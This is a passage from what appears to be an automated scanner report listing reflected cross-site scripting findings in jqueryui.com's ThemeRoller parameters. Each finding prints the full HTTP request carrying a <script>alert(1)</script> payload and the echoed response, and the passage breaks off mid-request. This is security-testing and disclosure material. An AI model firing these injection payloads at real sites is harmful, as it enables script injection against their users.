1.82. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a540e"><script>alert(1)</script>2fec129ecd0 was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pnga540e"><script>alert(1)</script>2fec129ecd0&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pnga540e"><script>alert(1)</script>2fec129ecd0&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

1.83. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7403f"><script>alert(1)</script>521994f8e38 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png7403f"><script>alert(1)</script>521994f8e38&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png7403f"><script>alert(1)</script>521994f8e38&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.84. http://jqueryui.com/themeroller/ [borderColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 759fc"><script>alert(1)</script>8a9102a62ac was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa759fc"><script>alert(1)</script>8a9102a62ac&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa759fc"><script>alert(1)</script>8a9102a62ac&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColor
...[SNIP]...

1.85. http://jqueryui.com/themeroller/ [borderColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 989c9"><script>alert(1)</script>521a1604b00 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa989c9"><script>alert(1)</script>521a1604b00&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa989c9"><script>alert(1)</script>521a1604b00&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dada
...[SNIP]...

1.86. http://jqueryui.com/themeroller/ [borderColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa52a"><script>alert(1)</script>8067e0305a5 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3aa52a"><script>alert(1)</script>8067e0305a5&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3aa52a"><script>alert(1)</script>8067e0305a5&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextur
...[SNIP]...

1.87. http://jqueryui.com/themeroller/ [borderColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45300"><script>alert(1)</script>52b8cc61183 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a45300"><script>alert(1)</script>52b8cc61183&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a45300"><script>alert(1)</script>52b8cc61183&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

1.88. http://jqueryui.com/themeroller/ [borderColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0a47"><script>alert(1)</script>60d08e980b0 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaad0a47"><script>alert(1)</script>60d08e980b0&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaad0a47"><script>alert(1)</script>60d08e980b0&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e
...[SNIP]...

1.89. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f63f"><script>alert(1)</script>163cc6d3cf8 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa19f63f"><script>alert(1)</script>163cc6d3cf8&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa19f63f"><script>alert(1)</script>163cc6d3cf8&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgT
...[SNIP]...

1.90. http://jqueryui.com/themeroller/ [borderColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72395"><script>alert(1)</script>c2b2e0d945c was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999972395"><script>alert(1)</script>c2b2e0d945c&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999972395"><script>alert(1)</script>c2b2e0d945c&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgT
...[SNIP]...

1.91. http://jqueryui.com/themeroller/ [cornerRadius parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b6c8"><script>alert(1)</script>794ffc806f6 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px6b6c8"><script>alert(1)</script>794ffc806f6&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=